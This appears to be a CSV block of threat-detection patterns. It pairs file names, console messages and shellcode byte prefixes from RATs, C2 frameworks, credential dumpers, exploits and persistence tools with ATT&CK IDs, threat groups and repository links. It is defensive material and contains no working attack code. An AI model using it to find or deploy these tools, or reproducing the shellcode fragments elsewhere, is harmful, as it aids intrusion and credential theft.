"*\xeno-rat-main*",".{0,1000}\\xeno\-rat\-main.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","19899"
"*\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48*",".{0,1000}\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xc8\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\\x20\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\\xed\\x52\\x41\\x51\\x48.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","19906"
"*\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\*",".{0,1000}\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf0\\x52\\x57\\x8b\\x52\\x10\\x8b\\x42\\x3c\\x01\\xd0\\x8b\\x40\\x78\\x85\\xc0\\x74\\x4a\\x01\\xd0\\x50\\x8b\\x48\\.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","19907"
"*\XHVNC.exe*",".{0,1000}\\XHVNC\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","19908"
"*\XiebroC2-main*",".{0,1000}\\XiebroC2\-main.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","N/A","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","19909"
"*\XKlog.txt*",".{0,1000}\\XKlog\.txt.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","Malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","N/A","N/A","10","","N/A","","","","19910"
"*\xmrig.exe*",".{0,1000}\\xmrig\.exe.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","19912"
"*\XOR_b64_encrypted\*",".{0,1000}\\XOR_b64_encrypted\\.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","0","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","19918"
"*\xorencrypt.py*",".{0,1000}\\xorencrypt\.py.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","0","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","19919"
"*\xp_evil_template.cpp*",".{0,1000}\\xp_evil_template\.cpp.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","19920"
"*\XpertRAT.exe*",".{0,1000}\\XpertRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19921"
"*\xpipe.c*",".{0,1000}\\xpipe\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/xPipe","1","0","N/A","N/A","10","10","77","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z","19922"
"*\xpipe.o*",".{0,1000}\\xpipe\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/xPipe","1","0","N/A","N/A","10","10","77","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z","19923"
"*\xRAT 2.exe*",".{0,1000}\\xRAT\s2\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19924"
"*\xrat-master\*",".{0,1000}\\xrat\-master\\.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19925"
"*\XRulez.cpp*",".{0,1000}\\XRulez\.cpp.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","19926"
"*\XRulez.exe*",".{0,1000}\\XRulez\.exe.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","19927"
"*\XRulez.sln*",".{0,1000}\\XRulez\.sln.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","19928"
"*\XRulez.zip*",".{0,1000}\\XRulez\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","19929"
"*\XRulez\Injector\*",".{0,1000}\\XRulez\\Injector\\.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","19930"
"*\XtremeRat.exe*",".{0,1000}\\XtremeRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","Molerats - Packrat - TA558","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19931"
"*\XWorm RAT V*",".{0,1000}\\XWorm\sRAT\sV.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","19932"
"*\XWorm.config*",".{0,1000}\\XWorm\.config.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","Malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","N/A","N/A","10","","N/A","","","","19933"
"*\XWorm.exe*",".{0,1000}\\XWorm\.exe.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","Malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","N/A","N/A","10","","N/A","","","","19934"
"*\XWorm.exe*",".{0,1000}\\XWorm\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","19935"
"*\XWorm.rar*",".{0,1000}\\XWorm\.rar.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","Malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","N/A","N/A","10","","N/A","","","","19936"
"*\XWorm.zip*",".{0,1000}\\XWorm\.zip.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","19937"
"*\XWorm-RAT-*",".{0,1000}\\XWorm\-RAT\-.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","19938"
"*\yanluowang.txt*",".{0,1000}\\yanluowang\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","19940"
"*\ysoserial\*",".{0,1000}\\ysoserial\\.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","19941"
"*\zero.exe *ProgramData*",".{0,1000}\\zero\.exe\s.{0,1000}ProgramData.{0,1000}","offensive_tool_keyword","zerologon","Zerologon CVE exploitation","T1210 - T1072","TA0008","N/A","Dispossessor","Exploitation tool","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","19949"
"*\ZeroHVCI.cpp*",".{0,1000}\\ZeroHVCI\.cpp.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","0","N/A","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","19950"
"*\ZeroHVCI.exe*",".{0,1000}\\ZeroHVCI\.exe.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","0","N/A","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","19951"
"*\ZeroHVCI.sln*",".{0,1000}\\ZeroHVCI\.sln.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","0","N/A","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","19952"
"*\ZeroHVCI-master*",".{0,1000}\\ZeroHVCI\-master.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","0","N/A","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","19953"
"*\zerologon.py*",".{0,1000}\\zerologon\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19954"
"*\ZipExec -*",".{0,1000}\\ZipExec\s\-.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","N/A","9","10","1026","153","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z","19955"
"*\ZipExec.exe*",".{0,1000}\\ZipExec\.exe.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","N/A","9","10","1026","153","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z","19956"
"*\ZipExec.go*",".{0,1000}\\ZipExec\.go.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","N/A","9","10","1026","153","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z","19957"
"*] - caution! this means that exploit is not fileless*",".{0,1000}\]\s\-\scaution!\sthis\smeans\sthat\sexploit\sis\snot\sfileless.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","19976"
"*] Already in high integrity, no need to privesc!*",".{0,1000}\]\sAlready\sin\shigh\sintegrity,\sno\sneed\sto\sprivesc!.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","19977"
"*] Already in high integrity, no need to privesc!*",".{0,1000}\]\sAlready\sin\shigh\sintegrity,\sno\sneed\sto\sprivesc!.{0,1000}","offensive_tool_keyword","SharpUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","19978"
"*] an up-to-date backdoor is active on *",".{0,1000}\]\san\sup\-to\-date\sbackdoor\sis\sactive\son\s.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","19979"
"*] Any passwords that were successfully sprayed have been output to *",".{0,1000}\]\sAny\spasswords\sthat\swere\ssuccessfully\ssprayed\shave\sbeen\soutput\sto\s.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","19980"
"*] Attempting stealthy LSASS dump*",".{0,1000}\]\sAttempting\sstealthy\sLSASS\sdump.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#content","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","19981"
"*] Attempting to enumerate logged on users on *",".{0,1000}\]\sAttempting\sto\senumerate\slogged\son\susers\son\s.{0,1000}","offensive_tool_keyword","GetLoggedOnUsersRegistry","PoC To enumerate logged on users on a remote system using the winreg named pipe","T1087 - T1018 - T1057","TA0007 - TA0008","N/A","N/A","Discovery","https://gist.github.com/RalphDesmangles/22f580655f479f189c1de9e7720776f1","1","0","N/A","N/A","8","8","N/A","N/A","N/A","N/A","19982"
"*] Bruteforcing %d CLSIDs*",".{0,1000}\]\sBruteforcing\s\%d\sCLSIDs.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","19983"
"*] Check for ADCS Vulnerabilities*",".{0,1000}\]\sCheck\sfor\sADCS\sVulnerabilities.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","19984"
"*] Cleaning At persistence methods*",".{0,1000}\]\sCleaning\sAt\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19985"
"*] Cleaning Backdoor binaries persistence methods*",".{0,1000}\]\sCleaning\sBackdoor\sbinaries\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19986"
"*] Cleaning Bind shell persistence methods*",".{0,1000}\]\sCleaning\sBind\sshell\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19987"
